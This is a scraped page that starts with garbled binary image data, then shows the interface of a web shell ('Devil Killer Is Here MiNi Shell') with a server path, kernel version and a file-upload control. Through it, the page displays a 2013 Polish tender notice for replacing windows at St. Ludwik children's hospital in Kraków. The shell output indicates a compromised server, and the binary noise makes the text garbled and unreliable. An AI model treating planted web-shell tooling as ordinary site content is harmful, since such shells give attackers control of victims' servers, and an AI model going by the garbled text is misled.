JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130819/164323-N-2013.html

<p class="kh_header"><b>Kraków: Roboty budowlane polegające na wymianie stolarki okiennej na elewacji zachodniej budynku Wojewódzkiego Specjalistycznego Szpitala Dziecięcego im. św. Ludwika w Krakowie, ul. Strzelecka 2</b><br>
<b>Numer ogłoszenia: 164323 - 2013; data zamieszczenia: 19.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Szpital Dziecięcy im. Św. Ludwika , ul. Strzelecka 2, 31-503 Kraków, woj. małopolskie, tel. 012 4110833, 4211344, 4211186, faks 012 4213765.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzieciecyszpital.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane polegające na wymianie stolarki okiennej na elewacji zachodniej budynku Wojewódzkiego Specjalistycznego Szpitala Dziecięcego im. św. Ludwika w Krakowie, ul. Strzelecka 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia są roboty budowlane, obejmujące swym zakresem wymianę (demontaż wraz z dostawą i montażem nowych okien wraz parapetami) istniejącej stolarki okiennej na elewacji zachodniej  budynku Wojewódzkiego Specjalistycznego Szpitala Dziecięcego im. św. Ludwika w Krakowie przy ul. Strzeleckiej 2, 31-503 Kraków zgodnie z dokumentacją projektową i dostosowaniem stolarki do wymogów dla szpitali pediatrycznych zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 26 czerwca 2012 roku w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. 2012.739).
3.2.	Roboty budowlane, objęte przedmiotem zamówienia są realizowane w ramach projektu współfinansowanego przez Województwo Małopolskie i jest częścią zadania pn. Wykonania robót budowlanych w zakresie przebudowy, zmiany sposobu użytkowania poddasza i nadbudowa Wojewódzkiego Specjalistycznego Szpitala dziecięcego im. św. Ludwika w Krakowie przy ul. Strzeleckiej 2 w Krakowie (działka nr 5 obr. 51 - Śródmieście), wraz z budową zewnętrznego szybu windowego, budową tunelu podziemnego, przebudowa ramp zewnętrznych oraz przebudową i budową wewnętrznych instalacji: elektrycznych, sanitarnych (wod-kan, c.o.), wentylacji oraz gazów medycznych oraz odtworzenia dwóch pomieszczeń piwnic z przeznaczeniem na wentylatornię, kategoria obiektu: XI, zgodnie z projektem architektoniczno-budowlanym, opracowanym przez Kontrapunkt V- Projekt Zespół Projektowo Inwestycyjny, ul. Zabłocie 39, 30-701 Kraków i na podstawie decyzji pozwolenia na budowę nr 2851/08 z dnia 12 grudnia 2008 r. oraz pozwoleniem nr 767/08 Małopolskiego Wojewódzkiego Konserwatora Zabytków. 
3.3.	Zakres prac objętych przedmiotem zamówienia został wskazany w:
3.3.1.	 dokumentacji projektowej pn. Projekt przebudowy (modernizacji i nadbudowy) Wojewódzkiego Specjalistycznego Szpitala Dziecięcego im. św. Ludwika w Krakowie przy ul. Strzeleckiej 2, działka nr 5, obr. 51 Śródmieście, stanowiącej załącznik nr 2 do SIWZ, 
3.3.2.	Programie prac konserwatorskich, stanowiącym załącznik nr 2 do SIWZ,
3.3.3.	Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych (STWiORB), stanowiącej załącznik nr 2 do SIWZ, 
3.3.4.	Informacji BIOZ stanowiącej załącznik nr 2 do SIWZ,
3.3.5.	Przedmiarach robót budowlanych, stanowiących załącznik nr 1B do SIWZ.
3.4.	Roboty muszą być wykonane zgodnie z obowiązującymi przepisami, normami, z należytą starannością oraz zasadami rzetelnej wiedzy technicznej i sztuki budowlanej. 
3.5.	Zakres zamówienia obejmuje wszystkie czynności umożliwiające i mające na celu wykonanie w ww. części budynku szpitala demontażu starych okien i montażu nowych  trójwarstwowych z drewna klejonego (kwatera zewnętrzna) i jednowarstwowa kwatera wewnętrzna w raz z parapetami, z zachowaniem kształtu i podziału istniejących okien, w szczególności prace obejmują:
-3.5.1. demontaż istniejących okien drewnianych, parapetów wewnętrznych; 
-3.5.2. transport nowych okien i parapetów drewnianych;
-3.5.3. wywóz elementów demontowanych, w tym wywóz i utylizacja gruzu;
-3.5.4. wykonanie i montaż nowych okien drewnianych z parapetami i klamkami z zamkiem na klucz do okien znajdujących się na oddziałach dziecięcych;
- 3.5.5. wykonanie szpalet w związku z wymianą okien; 
- zabezpieczenie elementów budynku przed uszkodzeniem; 
- 3.5.7. zabezpieczenie terenu budowy; i oznakowanie miejsca robót we własnym zakresie,
- 3.5.8. wykonanie planu BIOZ
- 3.5.9. wykonanie dokumentacji powykonawczej w dwóch egzemplarzach.
Skrzydło zewnętrzne szklone szybami zespolonymi pakiet P2/6/4.
Skrzydło wewnętrzne szklone szybą pojedynczą P2.
Zawiasy i klamki należy wykonać w kolorze mosiężnym starego złota lub w innym ustalonym z Zamawiającym. 
3.5.1.	zakres prac obejmuje również wykonanie przez Wykonawcę wszystkich towarzyszących robót budowlanych oraz prac związanych z BHP. Przedmiot zamówienia obejmuje wykonanie robót budowlanych z materiałów wykonawcy w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane.
3.6.	Przedmiot zamówienia winien być wykonany w oparciu o projekt architektoniczno-budowlany, o którym mowa w pkt 3.3.1 SIWZ (załącznik nr 2 do SIWZ), STWiORB (załącznik nr 2 do SIWZ). 
3.7.	Z uwagi, że budynek przy ul. Strzeleckiej 2 jest częścią składową Układu Urbanistycznego Wesołej wpisanego do Rejestru Zabytków pod nr Zabytków pod nr A-592 z dnia 31.12.1976 r., prace objęte przedmiotem zamówienia będą wykonywane pod nadzorem Małopolskiego Wojewódzkiego Konserwatora Zabytków, który wykonuje funkcje organu administracji państwowej w zakresie ochrony zabytków.
3.7.1.	W czasie planowania, organizacji, realizacji i wykonania przedmiotu zamówienia Wykonawca powinien uwzględnić niżej wymienione szczególne warunki wynikające z lokalizacji budynku, jego funkcji i specyfiki obecnego sposobu użytkowania: w budynku prowadzona jest działalność świadczenia usług medycznych - czynny Szpital. Wykonawca zobowiązany jest zatem do wykonywania wszystkich prac w sposób jak najmniej zakłócający funkcjonowanie obiektu budowlanego, zgodnie z ustalonym z Zamawiającym harmonogramem robót:
3.7.2.	w terminie do 3 dni roboczych od daty zawarcia umowy Wykonawca sporządzi i uzgodni z zamawiającym harmonogram robót z uwzględnieniem warunków realizacji w szczególności: dostępności obiektu w dni tygodnia od poniedziałku do soboty
3.7.3.	budynek będzie normalnie użytkowany w czasie realizacji zamówienia. Dostępność obiektu będzie utrudniona z uwagi na charakter obiektu (brak dostępu do wszystkich pomieszczeń jednocześnie), który przez okres wykonywania robót będzie czynny wobec osób pracujących i hospitalizowanych pacjentów. Pomieszczania w których Wykonawca wykonywać będzie roboty będą udostępniane w zależności od ilości pacjentów po wcześniejszym 3 dniowym ustaleniu z Zamawiającym terminu dotyczącego wymiany poszczególnych okien. Harmonogram uzgodniony z Zamawiającym ma zawierać co najmniej informacje w jakich dniach, godzinach i w jakich pomieszczeniach wykonywane będą roboty;
3.7.4.	prace mogą być realizowane wyłącznie w godzinach ustalonych z Zamawiającym;
3.7.5.	Wykonawca powinien mieć na uwadze wszelkie instalacje istniejące w budynku;
3.7.6.	Wykonawca jest zobowiązany, przy realizacji robót do przestrzegania obowiązujących przepisów w zakresie bezpieczeństwa i higieny pracy oraz przepisów w zakresie bezpieczeństwa przeciwpożarowego;
3.7.7.	gruz, materiały, urządzenia itp. pochodzące z rozbiórki Wykonawca będzie zobowiązany na własny koszt wywieźć poza teren nieruchomości szpitala i utylizować;
3.7.8.	miejsce prowadzenia robót Wykonawca będzie zobowiązany skutecznie zabezpieczyć przed dostępem osób nieupoważnionych oraz przed roznoszeniem się pyłu i kurzu na terenie nieruchomości i powierzchni sąsiadujących;
3.7.9.	Zamawiający nie zabezpiecza terenu do zorganizowania zaplecza budowy.
3.7.10.	Zakres robót obejmuje pełny zakres do prawidłowej realizacji przedmiotu umowy, w tym:
3.7.10.1.	Roboty budowlane obejmują w szczególności:
a.	demontaż istniejących okien drewnianych, parapetów wewnętrznych;
b.	 transport nowych okien i parapetów drewnianych;
c.	 wywóz elementów demontowanych, wywóz i utylizacja gruzu;
d.	 wykonanie i montaż nowych okien drewnianych z parapetami z zachowaniem kształtu i podziału istniejących okien;
e.	 wykonanie szpalet w związku z wymianą okien; 
f.	 zabezpieczenie elementów budynku przed uszkodzeniem; 
g.	 zabezpieczenie terenu budowy;
h.	 wykonanie dokumentacji powykonawczej 
Szczegółowy opis przedmiotu zamówienia zawarty jest w Załącznikach do SIWZ:
-	Projekt architektury (część) Projekt przebudowy (modernizacji i nadbudowy) Wojewódzkiego Specjalistycznego Szpitala Dziecięcego im. św. Ludwika w Krakowie przy ul. Strzeleckiej 2, działka nr 5, obr. 51 Śródmieście- stanowiący załącznik nr 2.
-	Specyfikacja techniczna wykonania i odbioru robót budowlanych- roboty ogólnobudowlane  Wymiana stolarki okiennej na elewacji zachodniej budynku Wojewódzkiego Specjalistycznego Szpitala Dziecięcego im. św. Ludwika w Krakowie, ul. Strzelecka 2, 31-503 Kraków - stanowiący załącznik nr 2.
-	Wytyczne do informacji BIOZ Wymiana stolarki okiennej na elewacji zachodniej budynku Wojewódzkiego Specjalistycznego Szpitala Dziecięcego im. św. Ludwika w Krakowie, ul. Strzelecka 2, 31-503 Kraków - stanowiący załącznik nr 2.
-	Przedmiary robót stanowiące załącznik nr 1B  
-	Pozwolenie nr 767/08 z dnia 6.11.2008 Małopolskiego Wojewódzkiego Konserwatora Zabytków na prowadzenie prac konserwatorskich i restauratorskich oraz robót budowlanych przy zabytku wpisanym do rejestru zabytków - stanowiący załącznik nr 2.
-	Pozwolenie na budowę wydane przez Prezydenta Miasta Krakowa Decyzja nr 2851/08 z dnia 12.12.2008 r. - stanowiący załącznik nr 2. 
3.7.10.2.	Wykonawca jest zobowiązany znać wszystkie przepisy prawne oraz inne regulacje prawne i wytyczne, które są w jakikolwiek sposób związane z prowadzonymi robotami i jest w pełni odpowiedzialny za przestrzeganie tych przepisów, norm i wytycznych w trakcie realizacji przedmiotu zamówienia.
3.8.	Wymagany okres gwarancji.
3.8.1.	Wykonawca udzieli rękojmi i gwarancji jakości na wykonany przedmiot zamówienia, nie krótszej niż trzy lata.
3.8.2.	Wykonawca odpowiada za wadę w robotach budowlanych również po upływie okresu gwarancji i rękojmi, o ile Zamawiający zawiadomił Wykonawcę o wadzie przed upływem okresu gwarancji i rękojmi.
3.9.	Zaleca się wykonawcy wykonanie wizji lokalnej miejsca robót (po uprzednim telefonicznym ustaleniu terminu wizji), w celu pozyskania wszelkich danych mogących być przydatnymi do przygotowania oferty oraz realizacji i rozliczenia przedmiotu zamówienia. Koszt dokonania wizji lokalnej poniesie wykonawca..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 20% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.42.11.32-8, 45.11.13.00-1, 45.41.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 77.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1.	Wykonawca zobowiązany jest wnieść wadium w kwocie: 5 000,00 zł. (słownie: pięć tysięcy złotych i 00/100) przed upływem terminu składania ofert. 
8.2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
8.2.1. pieniądzu,
8.2.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
8.2.3. gwarancjach bankowych,
8.2.4. gwarancjach ubezpieczeniowych, 
8.2.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
8.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: Pekao SA 06 1240 4689 1111 0000 5143 2083 z dopiskiem: Wadium DZP.272-25/13
8.4. Wykonawca powinien złożyć w ofercie dowód wniesienia wadium w przypadku wpłaty przelewem. Terminem wniesienia wadium jest data i czas uznania rachunku zamawiającego.
8.5. W przypadku wniesienia wadium w formach określonych w punkcie 8.2.2-8.2.5 wykonawca zobowiązany jest dołączyć do oferty kopię gwarancji bądź poręczenia (kserokopia dokumentu potwierdzoną za zgodność z oryginałem na każdej zapisanej stronie). Zamawiający zaleca niniejszą kopię dokumentu zszyć, zbindować lub w inny sposób trwale złączyć z ofertą. Oryginał dokumentu gwarancji bądź poręczenia należy złożyć w siedzibie Zamawiającego: Wojewódzki Specjalistyczny Szpital Dziecięcy im. św. Ludwika w Krakowie, ul. Strzelecka 2 (pok. nr 5). Zamawiający zaleca niniejszy oryginał dokumentu zszyć, zbindować lub w inny sposób trwale złączyć, by  była możliwość jego zwrócenia bez dekompletowania oferty.
8.6. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
8.6.1. być wystawione na Wojewódzki Specjalistyczny Szpital Dziecięcy im. św. Ludwika w Krakowie, 31-503 Kraków, ul. Strzelecka 2,
8.6.2. zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 4a i 5 ustawy pzp,
8.6.3. okres ważności wadium nie może być krótszy niż okres związania ofertą, przy czym pierwszym dniem ważności zobowiązania jest dzień składania ofert.
8.7. Zamawiający zwróci wadium na zasadach określonych w art. 46 ustawy. W przypadku wniesienia wadium w pieniądzu, w ofercie należy podać nazwę, adres banku oraz numer konta, na jakie zamawiający dokona zwrotu wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa opisu sposobu dokonywania oceny spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca wykonał (czyli doprowadzili do wystawienia protokołu odbioru końcowego bez uwag lub równoważnego dokumentu) w okresie
ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie (2) roboty budowlane, zrealizowane w ramach odrębnych umów, obejmujące swym zakresem wykonanie rekonstrukcji (wymiany) stolarki okiennej w obiektach wpisanych do rejestru zabytków o łącznej wartości nie mniejszej niż 200 000,00 zł brutto, w tym co najmniej jedna (1) ww. robota zrealizowana w czynnym obiekcie służby zdrowia 
Sprawdzenie spełnienia warunków udziału w postępowaniu zostanie dokonane na podstawie dołączonych do oferty właściwych oświadczeń i dokumentów wymienionych w pkt 6 SIWZ, według zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa opisu sposobu dokonywania oceny spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca dysponował co najmniej:
a)  jedną osobą, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń,
b) jedną osobą z minimum 2-letnim doświadczeniem w zakresie remontu zabytków nieruchomych oraz posiadającą uprawnienia do kierowania robotami budowlanymi przy zabytkach nieruchomych lub uprawnienia do prowadzenia prac w obiektach zabytkowych zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. Nr 165, poz. 987).
Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2006 r. nr 156, poz. 1118 z późn. zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. nr 63, poz. 394). Zamawiający dopuszcza łączenie kilku funkcji przez jedną osobę w przypadku posiadania przez nią kilku rodzajów wymaganych powyżej uprawnień budowlanych oraz wymaganych kwalifikacji i doświadczenia.
Sprawdzenie spełnienia warunków udziału w postępowaniu zostanie dokonane na podstawie dołączonych do oferty właściwych oświadczeń i dokumentów wymienionych w pkt 6 SIWZ, według zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby wykonawca był ubezpieczeny od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 250 000,00 złotych.
Sprawdzenie spełnienia warunków udziału w postępowaniu zostanie dokonane na podstawie dołączonych do oferty właściwych oświadczeń i dokumentów wymienionych w pkt 6 SIWZ, według zasady spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

